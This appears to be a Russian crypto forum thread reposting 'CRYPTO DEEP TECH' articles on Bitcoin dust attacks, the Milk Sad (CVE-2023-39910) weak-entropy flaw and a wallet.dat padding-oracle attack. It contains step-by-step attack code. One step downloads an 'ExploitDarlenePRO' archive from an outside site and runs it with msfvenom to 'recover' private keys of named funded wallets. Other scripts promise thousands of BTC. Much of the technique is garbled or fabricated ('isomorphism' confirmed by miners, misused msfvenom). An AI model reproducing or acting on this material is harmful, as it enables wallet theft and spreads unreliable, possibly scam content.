пожертвований благотворительным и некоммерческим организациям. Многие организации начали принимать пожертвования в биткоинах, поскольку они быстрее и прозрачнее традиционных методов. В заключение, утилиты Биткоин многочисленны и разнообразны. Его децентрализованный характер и отсутствие посредников делают его мощным инструментом для самых разных случаев использования. Поскольку технология продолжает развиваться и развиваться, мы можем ожидать увидеть еще более инновационные применения Биткоина в будущем. Список всех утилит Bitcoin: Мониторинг транзакций по биткоин-адресам с помощью Python и TxWatcher ↩︎ Нигири Вкусный контейнер для особых блюд в биткоинах, молниях и жидкостях ↩︎ «hal» — биткоин-клиент швейцарского армейского ножа (на основе ржавчины-биткоина) ↩︎ «BitKey» — Live USB для транзакций с воздушным зазором и «швейцарский армейский нож» Биткоин ↩︎ «Pycoin» — служебная библиотека биткоинов и альтернативных монет на основе Python ↩︎ «bx» — инструмент командной строки Bitcoin ↩︎ «HelloBitcoin» — набор простых программ, которые могут создавать биткоин-кошельки, создавать и подписывать транзакции, а также отправлять транзакции по сети биткоинов ↩︎ «Сканер HD-кошелька» — найдите все использованные адреса в ваших биткоин-HD-кошельках, минуя ограничения на пробелы ↩︎ «QR CODE» — настраиваемый, анимируемый веб-компонент на основе SVG, не требующий фреймворка и зависимостей ↩︎ Данный материал создан для портала CRYPTO DEEP TECH с целью обеспечения финансовой безопасности данных и криптографии эллиптических кривых secp256k1 от слабых подписей ECDSA в криптовалюте BITCOIN . Создатели программного обеспечения не несут ответственности за использование материалов. Источник Телеграмма: https://t.me/cryptodeeptech Ютуб: https://www.youtube.com/@cryptodeeptech Видеоматериал: https://dzen.ru/video/watch/65de483b3474ef16c0430f35 Источник: https://cryptodeep.ru/bitcoin-utilities Криптоанализ
  2. CRYPTO DEEP TECH Видеоматериал В этой статье мы раскроем обширную тему: “Dust Attack” известная как: "Dusting Attack" или "Crypto Dust". Возможно каждый пользователь криптовалют или держатель большой суммы монет BTC, ETH замещал на своем криптовалютном кошельке поступление незначительно малой суммы монет в satoshi, это поступление маскируется под видом "Donate", но на самом деле это целая математический отточенная система по отъёму всех накопленных монет кошелька на балансе. Целью раскрытие системы и всех подводных камней “Dust Attack”, нас подвигла и натолкнуло статья опубликованная 8 января 2024 г. на сайте глобальной криптоэкономики CoinDesk https://www.coindesk.com/markets/2024/01/08/mysterious-12m-bitcoin-transaction-to-satoshi-nakamoto-sparks-speculations/ pic.twitter.com/w34kjnAHPJ d7db4f96a4059c8906b953677ce533493d7b9da0f854a21b99f5772910dd0a31 Рассмотрим ещё одну статью и возьмем для примера TXID из которого было совершено очень большое количество пылевой атаки. https://dust-attack.blogspot.com 1d6580dcd979951bd600252b741c22a3ea8e605e43168f8452c68915c3ea2bf3 Обратим внимание на два Биткоин Адреса которые в период [июль-август 2022] совершили успешные пылевые атаки на общую сумму: 10000 BTC https://www.blockchain.com/explorer/addresses/btc/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt Для проведение пылевой атаки большую роль играет подтверждение изоморфизма майнерами, т.к. с 2022 по 2024 года многие криптовалютные сервисы и аппаратные кошельки активно борются с пылевой атакой. На данный момент широкую популярность получил способ самостоятельно создавать пылевые транзакции на собственном холодном кошельке. Возьмем пример № 1 и перейдем в раздел “Create Dust Transaction” Link to gif content #01 ‘zmq’ ‘urllib3’ ‘requests’ ‘bitcoin-utils’ ‘bitcoinaddress’ Link to gif content #02 Link to gif content #03 Баланс: 0.02786906 BTC или в единицах Биткоина: 2786906 satoshi Дерево Меркла заполняется снизу вверх, где к каждому блоку данных применяется хеширование, а полученные значения записываются в листья дерева. Блоки, которые находятся уровнем выше, заполняются значением суммы хешем двух дочерних блоков. Этот процесс повторяется до того момента, пока не будет получено верхнее значение или Корень Меркла (Merkle Root). В блокчейне Bitcon используется хеш-функция SHA256. Другие блокчейны могут использовать другие принципы шифрования для создания Дерева Меркла. Хэш платежа от пополнение баланса https://btc1.trezor.io/tx/0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5 dust_tx = bytes.fromhex("0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5") pk = PrivateKey.parse("L1k********************************************MdrTj") tx_in._value = 2786906 Прибыль от пылевой атаки. Выбираем Биткоин Кошелек от которого в конечном итоге получаем прибыль в случае подтверждение майнерами изоморфизма. Так как мы рассматриваем пример №1 в нашем случае мы выбираем адрес Биткоин Кошелька: 14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i https://www.blockchain.com/explorer/addresses/btc/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i send_dust = "14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i" TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()), 555 + 226 = 781 satoshi 2786906 - 781 = 2786125 satoshi TxOut(2786125, Tx.get_address_data(pk.address())['script_pubkey'].serialize()) Запуск скрипта: createrawtransaction.py from io import BytesIO from secp256k1 import * from sighash import * pk = PrivateKey.parse("L1k********************************************MdrTj") pk.address() dust_tx = bytes.fromhex("0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5") dust_index = 0 send_dust = "14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i" tx_in = TxIn(dust_tx, dust_index, b'', 0xffffffff) tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey'] tx_in._value = 2786906 tx_ins = [ tx_in ] tx_outs = [ TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()), TxOut(2786125, Tx.get_address_data(pk.address())['script_pubkey'].serialize()) ] tx = Tx(1, tx_ins, tx_outs, 0, testnet=True) signature(tx, 0, pk) tx.serialize().hex() print("\n--------------------------------------\n") print("My work Bitcoin Address: " + pk.address()) print("Address for Getting Rich: " + send_dust) print("\n--------------------------------------\n") print(tx_in._script_pubkey) print(tx_in.script_sig) print("\n--------------------------------------\n") print("RawTX for performing isomorphism:") print(tx.serialize().hex()) print("\n--------------------------------------\n") Результат: -------------------------------------- My work Bitcoin Address: 1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK Address for Getting Rich: 14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i -------------------------------------- OP_DUP OP_HASH160 b'2581997c24562e316ffa3163e63d2db26442cc9a' OP_EQUALVERIFY OP_CHECKSIG b'304402203b2c7941c858d201ac384029e88c9988f6baa433d061eacb765caa356d6e1a7e02203885dd1be0e8a5b0890dde12674c508608f0c60872a4acbc5fb3b9fd1978d916' b'02fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5a' -------------------------------------- RawTX for performing isomorphism: 0200000001c593d1502ece362f78bcdabe8e250cb2e9cfcad5149a3dde781f33d42d3c250b010000006a47304402203b2c7941c858d201ac384029e88c9988f6baa433d061eacb765caa356d6e1a7e02203885dd1be0e8a5b0890dde12674c508608f0c60872a4acbc5fb3b9fd1978d916012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff022b020000000000001976a9142581997c24562e316ffa3163e63d2db26442cc9a88ac4d832a00000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688acd9530800 -------------------------------------- Link to gif content #04.1 RawTX for performing isomorphism: 0200000001c593d1502ece362f78bcdabe8e250cb2e9cfcad5149a3dde781f33d42d3c250b010000006a47304402203b2c7941c858d201ac384029e88c9988f6baa433d061eacb765caa356d6e1a7e02203885dd1be0e8a5b0890dde12674c508608f0c60872a4acbc5fb3b9fd1978d916012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff022b020000000000001976a9142581997c24562e316ffa3163e63d2db26442cc9a88ac4d832a00000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688acd9530800 ScriptSig Isomorphism Link to gif content #05.1 https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i/isomorphism.txt Запустим скрипт указав print(tx.serialize().hex()[+10:+74]) и преобразуем весь список txid в потоковый формат hash Link to gif content #06 Link to gif content #08 Замена публичного ключа в файле: isomorphism.txt https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i/PublicKey.txt Link to gif content #10 Биткоин адрес для получения всей прибыли: 36ZfWyL5NGvC2u54QENyUgDzTgNyHe1xpE print(Tx.get_address_data(send_dust)['script_pubkey']) Link to gif content #12 https://coinbin.ru/#verify Сумма прибыли в монетах от пылевой атаки составляет: 5000.00141092 BTC // $ 209364,284.08 United States Dollar https://www.coinbase.com/converter/btc/usd Пример №2 https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt Хэш платежа от пополнение баланса https://btc1.trezor.io/tx/655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5 dust_tx = bytes.fromhex("655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5") pk = PrivateKey.parse("L1k********************************************MdrTj") tx_in._value = 33532 Прибыль от пылевой атаки. Выбираем Биткоин Кошелек от которого в конечном итоге получаем прибыль в случае подтверждение майнерами изоморфизма. Так как мы рассматриваем пример №2 в нашем случае мы выбираем адрес Биткоин Кошелька: 15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt send_dust = "15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt" TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()), 555 + 226 = 781 satoshi 33532 - 781 = 32751 satoshi TxOut(32751, Tx.get_address_data(pk.address())['script_pubkey'].serialize()) Запуск скрипта: createrawtransaction.py from io import BytesIO from secp256k1 import * from sighash import * pk = PrivateKey.parse("L1k********************************************MdrTj") pk.address() dust_tx = bytes.fromhex("655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5") dust_index = 0 send_dust = "15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt" tx_in = TxIn(dust_tx, dust_index, b'', 0xffffffff) tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey'] tx_in._value = 33532 tx_ins = [ tx_in ] tx_outs = [ TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()), TxOut(32751, Tx.get_address_data(pk.address())['script_pubkey'].serialize()) ] tx = Tx(1, tx_ins, tx_outs, 0, testnet=True) signature(tx, 0, pk) tx.serialize().hex() print("\n--------------------------------------\n") print("My work Bitcoin Address: " + pk.address()) print("Address for Getting Rich: " + send_dust) print("\n--------------------------------------\n") print(tx_in._script_pubkey) print(tx_in.script_sig) print("\n--------------------------------------\n") print("RawTX for performing isomorphism:") print(tx.serialize().hex()) print("\n--------------------------------------\n") Результат: -------------------------------------- My work Bitcoin Address: 1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK Address for Getting Rich: 15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt -------------------------------------- OP_DUP OP_HASH160 b'662367a3d78a4b0fcbb3020b3d724981d10934f6' OP_EQUALVERIFY OP_CHECKSIG b'3045022100dcd830d15f3a8cad03526bac2540570431a8691450a2959cc1badcc2e563124e0220013aa9e38bf45e4afc3859ee34ac8522106f1d202246c247ed945da89bdba622' b'02fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5a' -------------------------------------- RawTX for performing isomorphism: 0200000001c51c5e64bc3a599b1cfaed2fa0917999071a17b3703d9dec1c7259f03b535c65010000006b483045022100dcd830d15f3a8cad03526bac2540570431a8691450a2959cc1badcc2e563124e0220013aa9e38bf45e4afc3859ee34ac8522106f1d202246c247ed945da89bdba622012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff02ef7f0000000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688ac2b020000000000001976a9143467e56d5193558eacdae84af5c1c72ee158dd6788acd9530800 -------------------------------------- Link to gif content #04.2 RawTX for performing isomorphism: 0200000001c51c5e64bc3a599b1cfaed2fa0917999071a17b3703d9dec1c7259f03b535c65010000006b483045022100dcd830d15f3a8cad03526bac2540570431a8691450a2959cc1badcc2e563124e0220013aa9e38bf45e4afc3859ee34ac8522106f1d202246c247ed945da89bdba622012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff02ef7f0000000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688ac2b020000000000001976a9143467e56d5193558eacdae84af5c1c72ee158dd6788acd9530800 ScriptSig Isomorphism Link to gif content #05.2 https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt/isomorphism.txt Запустим скрипт указав print(tx.serialize().hex()[+10:+74]) и преобразуем весь список txid в потоковый формат hash Link to gif content #07 Link to gif content #09 Замена публичного ключа в файле: isomorphism.txt https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt/PublicKey.txt Link to gif content #11 Биткоин адрес для получения всей прибыли: 3GsC42MbUrtGU4un6QHbXkyjKVawyvm6ac print(Tx.get_address_data(send_dust)['script_pubkey']) Link to gif content #13 Любая транзакция должна быть подтверждена майнерами для того чтобы RawTX отправить в поле раздела: Broadcast Transaction для передачи заявки на подтверждение майнерами, необходимо тщательно убедиться, что платеж создан корректно для этого переходим в раздел: Verify Transactions and other scripts https://coinbin.ru/#verify Сумма прибыли в монетах от пылевой атаки составляет: 5001.51473912 BTC // $ 215831966,02 United States Dollar https://www.coinbase.com/converter/btc/usd References: [1] Exploring Unconfirmed Transactions for Effective Bitcoin Address Clustering (Kai Wang, Fudan University, Maike Tong, Fudan University, Changhao Wu, Fudan University,Jun Pang, University of Luxembourg, Chen Chen, Fudan University, Xiapu Luo, The Hong Kong Polytechnic University,Weili Han, Fudan University) [2] Bitcoin security – Anti-Dust Attack (Ajin S, Master of Computer Application, Amal Jyothi College of Engineering koovapally, Kottayam, India) [3] Data Insertion in Bitcoin’s Blockchain (Andrew Sward, Ivy Vecna, Forrest Stonedahl) [4] Bitcoin Will Bite the Dust (Kevin Dowd and Martin Hutchinson) [5] DATA ANALYTICS AND CONSENSUS MECHANISMS IN BLOCKCHAINS (Dániel FEHÉR) [6] Does Bitcoin Need Regulation: An Analysis of Bitcoin’s Decentralized Nature as a Security and Regulatory Concern for Governments (Hadeka Rasul Seton Hall University, 2018) [7] Exploiting Cryptocurrencies Toward Bitcoin Exchanges And Provided Solution For Current Problems (A. Punyavardhan Raj , G. Nithinb, A. Sai Bharathc, Ch. Abhishekd, B. Prasanth Kumare, Department of CSE, GMR Institute of Technology, Rajam, India) [8] Is Bitcoin gathering dust? An analysis of low-amount Bitcoin transactions (Matteo Loporchio, Anna Bernasconi, Damiano Di Francesco Maesa and Laura Ricci) Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов. Исходный код Telegram: https://t.me/cryptodeeptech YouTube: https://www.youtube.com/@cryptodeeptech Видеоматериал: https://dzen.ru/video/watch/65be9256df804947fbd96fd7 Источник: https://cryptodeep.ru/dustattack Криптоанализ
  3. CRYPTO DEEP TECH Видеоматериал: https://dzen.ru/video/watch/65478a2f6d9f3f7ec9641804 Исследователи компании “Slowmist” проводят регулярное исследование сферы безопасности блокчейна Биткоин. Они обнародовали уязвимость в библиотеке Libbitcoin Explorer 3.x, который позволила злоумышленникам украсть более $ 900 000 у пользователей Биткоин Кошельков (BTC) По данным аналитиков, эта уязвимость может также затронуть пользователей Ethereum, Ripple, Dogecoin, Solana, Litecoin, Bitcoin Cash и Zcash, которые используют Libbitcoin для создания учетных записей. Исследователи дали кодовое название для данной уязвимости «Milk Sad» Было предложено использовать первые два слова первого мнемонического секрета BIP39, сгенерированного bx нулевым временем https://milksad.info/disclosure.html#codename-milk-sad Техническое описание Техническое описание CVE-2023-39910 Cлабая энтропия в Cake Wallet Uint8List randomBytes(int length, {bool secure = false}) { assert(length > 0); final random = secure ? Random.secure() : Random(); final ret = Uint8List(length); for (var i = 0; i < length; i++) { ret[i] = random.nextInt(256); } return ret; } Random::Random() { uint64_t seed = FLAG_random_seed; if (seed == 0) { Dart_EntropySource callback = Dart::entropy_source_callback(); if (callback != nullptr) { if (!callback(reinterpret_cast<uint8_t*>(&seed), sizeof(seed))) { // Callback failed. Reset the seed to 0. seed = 0; } } } if (seed == 0) { // We did not get a seed so far. As a fallback we do use the current time. seed = OS::GetCurrentTimeMicros(); } Initialize(seed); } Средства каждого кошелька, созданного с помощью браузерного расширения Trust Wallet, могли быть украдены без какого-либо вмешательства пользователя. Совсем недавно, Donjon группа исследований безопасности в Ledger обнаружил критическую уязвимость в этом расширении браузера Trust Wallet, позволяющую злоумышленнику украсть все активы любого кошелька, созданного с помощью этого расширения, без какого-либо взаимодействия с пользователем. Зная адрес учетной записи, можно немедленно вычислить ее закрытый ключ, а затем получить доступ ко всем ее средствам. Ниже приведены подробные сведения об уязвимости, о том, как Ledger Donjon обнаружил ее, ее влияние с течением времени, оценка уязвимых активов и то, как Trust Wallet отреагировал на ее исправление. Но начнем с напоминания основ. Cложно продемонстрировать, что случайные числа верны, а плохой, но не смертельно ошибочный генератор случайных чисел может легко обмануть наблюдателя. Для хорошей случайности нам нужно равномерное распределение битов и байтов (и даже всех размеров кусков) и непредсказуемость. Для наблюдателя последовательности должно быть невозможно иметь какую-либо информацию о следующей части генерируемой последовательности. Поскольку достичь этих свойств невероятно сложно, криптовалютное пространство старается максимально избегать зависимости от случайности, но на одном этапе она нам все равно понадобится: когда мы создаем новый кошелек. Вы, вероятно, уже знакомы со своей мнемоникой — от 12 до 24 английских слов, которые позволяют вам создавать резервные копии вашего кошелька (если нет, вы можете прочитать статью Ledger Academy по этой самой теме). Эта мнемоника кодирует от 16 до 32 байтов энтропии в соответствии со стандартом BIP 39. Качество этой энтропии имеет решающее значение, поскольку она будет исходным кодом всех ключей, используемых вашим кошельком во всех цепочках, после детерминированного процесса вывода, определенного стандарты BIP 32 и BIP 44 . https://milksad.info/disclosure.html#not-even-the-second-hack-mersenne-twister-use-in-trust-wallet // Copyright © 2017-2022 Trust Wallet. // [...] void random_buffer(uint8_t* buf, size_t len) { std::mt19937 rng(std::random_device{}()); std::generate_n(buf, len, [&rng]() -> uint8_t { return rng() & 0x000000ff; }); return; } Полную развернутую документацию теоретической части можно изучить в блоге: Ledger Donjon , а также в документации: Milk Sad Перейдем к практической части: (Вы можете открыть готовый файл от Jupyter Notebook и загрузить в блокнот Google Colab ) https://colab.research.google.com/drive/1OhspSm7GBGiqv3WfhAqU5SJ_BgXIbUh3 https://github.com/demining/CryptoDeepTools/tree/main/25MilkSadVulnerability Рассмотрим реальные примеры извлечение приватного ключа Биткоин Кошелька с помощью уязвимости в библиотеке Libbitcoin Explorer 3.x, https://btc1.trezor.io/address/12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 Vulnerability_in_Libbitcoin_Explorer_3_x_library.ipynb Установим Ruby в Google Colab !sudo apt install ruby-full !ruby --version Версия ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux-gnu] !gem install bitcoin-ruby !gem install ecdsa !gem install base58 !gem install crypto !gem install config-hash -v 0.9.0 Установим Metasploit Framework и воспользуемся MSFVenom !git clone https://github.com/rapid7/metasploit-framework.git ls cd metasploit-framework/ ls Опции: !./msfvenom -help Откроем обнаруженную уязвимость CVE-2023-39910 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39910 Откроем код: https://github.com/libbitcoin/libbitcoin-system/blob/a1b777fc51d9c04e0c7a1dec5cc746b82a6afe64/src/crypto/pseudo_random.cpp#L66C12-L78 libbitcoin-system Bitcoin Cross-Platform C++ Development Toolkit https://github.com/libbitcoin/libbitcoin-system.git Установим libbitcoin-system в Google Colab: !git clone https://github.com/libbitcoin/libbitcoin-system.git ls Откроем уязвимый файл: pseudo_random.cpp через утилиту cat cat libbitcoin-system/src/crypto/pseudo_random.cpp Откроем папки по каталогу: /modules/exploits/ ExploitDarlenePRO Загрузим "ExploitDarlenePRO" по каталогу: /modules/exploits/ cd modules/ ls cd exploits/ !wget https://darlene.pro/repository/e8e4973fb52934d5fb0006a47304f5099701000619d9ac79c083664e6063c579/ExploitDarlenePRO.zip Разархивируем содержимое ExploitDarlenePRO.zip через утилиту unzip !unzip ExploitDarlenePRO.zip Перейдем по каталогу: /ExploitDarlenePRO/ ls cd ExploitDarlenePRO/ ls Для запуска эксплойта перейдем обратно к Metasploit Framework cd / cd content/metasploit-framework/ ls Нам необходимо определить наш LHOST (Local Host) наш IP-address атакующей виртуальной машины. Запустим команды: !ip addr !hostname -I Воспользуемся инструментом для создания полезной нагрузки MSFVenom Для эксплуатации выбираем Биткоин Кошелек: 12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 https://btc1.trezor.io/address/12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 Команда запуска: !./msfvenom 12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o main.rb -p libbitcoin-system/src/crypto LHOST=172.28.0.12 -f CPP -o pseudo_random.cpp Результат: 1100001100100111111110101100011000111101101101111110000011001100110100010111000001101100000000111110101101011011111000001101101100101010101100111110001101111010010001010001101110000100000001010100000100000000110110000101111100110001010011100000111110001011 Полученный бинарный формат нам необходимо сохранить в файл: binary.txt воспользуемся утилитой echo Команда: !echo '1100001100100111111110101100011000111101101101111110000011001100110100010111000001101100000000111110101101011011111000001101101100101010101100111110001101111010010001010001101110000100000001010100000100000000110110000101111100110001010011100000111110001011' > binary.txt Конвертируем бинарный формат в HEX-формат для получение приватного ключа Биткоин Кошелька: Воспользуемся кодом: binaryFile = open("binary.txt", "r") binaryFile = binaryFile.readlines() hexFile = open("hex.txt", "w+") # loop through each line of binaryFile then convert and write to hexFile for line in binaryFile: binaryCode = line.replace(" ", "") hexCode = hex(int(binaryCode, 2)) hexCode = hexCode.replace("0x", "").upper().zfill(4) hexFile.write(hexCode + "\n") # close hexFile hexFile.close() Откроем файл: hex.txt cat hex.txt C327FAC63DB7E0CCD1706C03EB5BE0DB2AB3E37A451B84054100D85F314E0F8B Приватный Ключ Найден! Установим модуль Bitcoin !pip3 install bitcoin Запустим код для проверки соответствие Биткоин Адреса: from bitcoin import * with open("hex.txt","r") as f: content = f.readlines() # you may also want to remove whitespace characters like `\n` at the end of each line content = [x.strip() for x in content] f.close() outfile = open("privtoaddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем файл: privtoaddr.txt cat privtoaddr.txt Результат: C327FAC63DB7E0CCD1706C03EB5BE0DB2AB3E37A451B84054100D85F314E0F8B:12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 Откроем bitaddress и проверим: ADDR: 12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 WIF: L3m4xHPEnE2yM1JVAY2xTzraJsyPERxw2Htt3bszbTiDn5JiZCcy HEX: C327FAC63DB7E0CCD1706C03EB5BE0DB2AB3E37A451B84054100D85F314E0F8B https://www.blockchain.com/en/explorer/addresses/btc/12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 BALANCE: $ 40886.76 Рассмотрим второй пример: №2 Рассмотрим второй пример извлечение приватного ключа Биткоин Кошелька с помощью уязвимости в библиотеке Libbitcoin Explorer 3.x, https://btc1.trezor.io/address/1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe Снова воспользуемся уязвимым файлом: pseudo_random.cpp Команда запуска: !./msfvenom 1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o main.rb -p libbitcoin-system/src/crypto LHOST=172.28.0.12 -f CPP -o pseudo_random.cpp Результат: 111100100010010000111110010011001000101100111100000101110100001001100001011010111111110110111111100001000100011111001010000011011101001000101000100001100111001010100110101101001100011001001111101101010000000011101101111111110101101110110100110000110111100 Полученный бинарный формат нам необходимо сохранить в файл: binary.txt воспользуемся утилитой echo Команда: !echo '111100100010010000111110010011001000101100111100000101110100001001100001011010111111110110111111100001000100011111001010000011011101001000101000100001100111001010100110101101001100011001001111101101010000000011101101111111110101101110110100110000110111100' > binary.txt Конвертируем бинарный формат в HEX-формат для получение приватного ключа Биткоин Кошелька: Воспользуемся кодом: binaryFile = open("binary.txt", "r") binaryFile = binaryFile.readlines() hexFile = open("hex.txt", "w+") # loop through each line of binaryFile then convert and write to hexFile for line in binaryFile: binaryCode = line.replace(" ", "") hexCode = hex(int(binaryCode, 2)) hexCode = hexCode.replace("0x", "").upper().zfill(4) hexFile.write(hexCode + "\n") # close hexFile hexFile.close() Откроем файл: hex.txt cat hex.txt 79121F26459E0BA130B5FEDFC223E506E9144339535A6327DA8076FFADDA61BC Приватный Ключ Найден! Запустим код для проверки соответствие Биткоин Адреса: from bitcoin import * with open("hex.txt","r") as f: content = f.readlines() # you may also want to remove whitespace characters like `\n` at the end of each line content = [x.strip() for x in content] f.close() outfile = open("privtoaddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем файл: privtoaddr.txt cat privtoaddr.txt 79121F26459E0BA130B5FEDFC223E506E9144339535A6327DA8076FFADDA61BC:1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe Результат: 79121F26459E0BA130B5FEDFC223E506E9144339535A6327DA8076FFADDA61BC:1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe Откроем bitaddress и проверим: ADDR: 1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe WIF: L1H4Eu2et8TWYQ3kv9grtPGshikGN398MVJkN6zYMikcpQTB96UN HEX: 79121F26459E0BA130B5FEDFC223E506E9144339535A6327DA8076FFADDA61BC https://www.blockchain.com/en/explorer/addresses/btc/1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe BALANCE: $ 19886.91 References: [1] Mersenne Twister – A Pseudo Random Number Generator and its Variants (Archana Jagannatam) [2] RFC 8682 TinyMT32 Pseudorandom Number Generator [PRNG] (M. Saito Hiroshima University M. Matsumoto Hiroshima University V. Roca, Ed. INRIA E. Baccelli) [3] Introduction to Mersenne Twister Pseudorandom number generator Qiao Zhou [June 30, 2016] [4] High-Performance Pseudo-Random Number Generation on Graphics Processing Units (Nimalan Nandapalan , Richard P. Brent , Lawrence M. Murray , and Alistair Rendell) [5] The Mersenne Twister Output Stream Postprocessing (Yurii Shcherbyna , Nadiia Kazakova , Oleksii Fraze-Frazenko) [6] Cellular Automaton–Based Emulation of the Mersenne Twister (Kamalika Bhattacharjee, Nitin More, Shobhit Kumar Singh, Nikhil Verma) [7] Generating Efficient and High-Quality Pseudo-Random Behavior on Automata Processors (Jack Wadden, Nathan Brunelle, Ke Wang, Mohamed El-Hadedy, Gabriel Robins, Mircea Stan and Kevin Skadron) Исходный код Telegram: https://t.me/cryptodeeptech Видеоматериал: https://dzen.ru/video/watch/65478a2f6d9f3f7ec9641804 Источник: https://cryptodeep.ru/milk-sad-vulnerability-in-libbitcoin-explorer Криптоанализ
  4. Приветствую всех, ищу людей у кого есть готовый coin, токен или монеты, которые не востребованные или кто не знает, что с ними делать, готов на сотрудничество, есть предложение tg: @der8i
  5. CRYPTO DEEP TECH В этой статье мы воспользуемся классификацией распространенных шаблонов атак из ресурса кибербезопасности [CAPEC™]. В первые об “Padding Oracle Attack” на Wallet.dat заговорили в далеком 2012 году (на платформе по управления уязвимостями и анализа угроз “VulDB”). Проблема самого популярного кошелька Bitcoin Core влияет на работу AES Encryption Padding в файле Wallet.dat Технические подробности данной атаки известны: https://en.wikipedia.org/wiki/Padding_oracle_attack Процесс Padding Oracle Attack на Wallet.dat Перейдем к практической части и выполним ряд действии через эксплойт, чтобы в процессе заполнить оракул в файле Wallet.dat и в конечном итоге найти необходимый нам пароль в бинарном формате. Capture The Flag (CTF) Раннее исследователи и участники турнира CTF выложили в публичный доступ взломанный [ wallet.dat 2023 года] Биткоин Кошелек: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b на сумму: 44502.42 долларов США // БИТКОИН: 1.17461256 BTC https://btc1.trezor.io/address/1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b Перейдем по ссылке на releases Bitcoin Core version 22.1 https://github.com/bitcoin/bitcoin/releases Index of /bin/bitcoin-core-22.1/ ../ test.rc1/ 08-Nov-2022 18:08 - test.rc2/ 28-Nov-2022 09:39 - SHA256SUMS 14-Dec-2022 17:59 2353 SHA256SUMS.asc 14-Dec-2022 17:59 10714 SHA256SUMS.ots 14-Dec-2022 17:59 538 bitcoin-22.1-aarch64-linux-gnu.tar.gz 14-Dec-2022 17:59 34264786 bitcoin-22.1-arm-linux-gnueabihf.tar.gz 14-Dec-2022 18:00 30424198 bitcoin-22.1-osx-signed.dmg 14-Dec-2022 18:00 14838454 bitcoin-22.1-osx64.tar.gz 14-Dec-2022 18:00 27930578 bitcoin-22.1-powerpc64-linux-gnu.tar.gz 14-Dec-2022 18:00 39999102 bitcoin-22.1-powerpc64le-linux-gnu.tar.gz 14-Dec-2022 18:00 38867643 bitcoin-22.1-riscv64-linux-gnu.tar.gz 14-Dec-2022 18:01 34114511 